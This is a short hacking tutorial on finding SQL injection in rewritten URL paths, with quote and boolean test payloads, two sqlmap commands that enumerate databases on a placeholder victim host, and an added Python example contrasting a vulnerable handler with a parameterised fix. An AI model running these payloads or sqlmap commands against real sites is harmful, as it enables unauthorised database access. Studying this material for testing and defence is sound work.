SQL Injections in URL Rewrite

First of all, what is URL rewriting?
You’ve likely seen sites with this pattern in their URLs: http://victim.com/?id=1
Almost everyone knows how to test for SQL injection in this situation:
http://mysite.com/?id=1' or
http://mysite.com/?id=1 and 2.5=2.5 or
http://mysite.com/?id=1 and 3.4=3.5
and so on.
But with URL rewriting, this URL
http://victim.com/?id=1
becomes
http://victim.com/1
(the id parameter name is hidden, and its value 1 is used directly in the URL path).

To test for SQL injection in this kind of URL, we use the same payloads as before, but place them after the value in the path:
http://victim.com/1' or
http://victim.com/1 and 3.6=3.6
http://victim.com/1 and 3.6=3.77

and so on.
The results would be the same as with a normal post parameter.
To test for SQL injection with sqlmap, we mark the injection point with a star (*). For instance:
sqlmap -u "http://victim.com/1*" --random-agent --level 5 --risk 3 --dbs
or, to inject into the content parameter:
sqlmap -u "http://victim.com/content*/1" --random-agent --level 5 --risk 3 --dbs
The star sign shows sqlmap where to inject payloads.
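
Why a rewritten URL stays injectable, and what the handler behind it should do, shown as an added example that is not code from the original post. The rewrite rule, the articles table and the function names are assumptions made for illustration; the test strings are the ones used above.

```python
import re
import sqlite3
from urllib.parse import unquote

# Constructed sample data; the table and column names are assumptions.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
db.executemany("INSERT INTO articles VALUES (?, ?)", [(1, "first"), (2, "second")])

# Hypothetical rewrite rule: /<segment> is served internally as /?id=<segment>.
REWRITE = re.compile(r"^/(?P<id>[^/?]+)$")
SQL_ERROR = "sql-error"  # marker returned when the database rejects the query


def rewritten_id(path):
    """Return the id value the rewrite layer hands to the application."""
    match = REWRITE.match(unquote(path))
    return match.group("id") if match else None


def lookup_vulnerable(path):
    """Concatenates the path segment into SQL: injectable despite the clean URL."""
    value = rewritten_id(path)
    if value is None:
        return []
    try:
        return db.execute("SELECT title FROM articles WHERE id = " + value).fetchall()
    except sqlite3.Error:
        return SQL_ERROR  # e.g. the stray quote in /1' breaks the statement


def lookup_hardened(path):
    """Accepts only a short run of ASCII digits and binds it as a parameter."""
    value = rewritten_id(path)
    if value is None or not re.fullmatch(r"[0-9]{1,18}", value):
        return []  # anything that is not a plain numeric id is rejected
    return db.execute("SELECT title FROM articles WHERE id = ?", (int(value),)).fetchall()


if __name__ == "__main__":
    # The page's own test strings, URL-encoded as a browser would send them.
    for p in ["/1", "/1%20and%203.6=3.6", "/1%20and%203.6=3.77", "/1'"]:
        print(p, "| vulnerable:", lookup_vulnerable(p), "| hardened:", lookup_hardened(p))
```

The row/no-row/error difference returned by the vulnerable handler is what the manual checks above observe; the hardened handler returns the same empty result for all three.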

Happy Hacking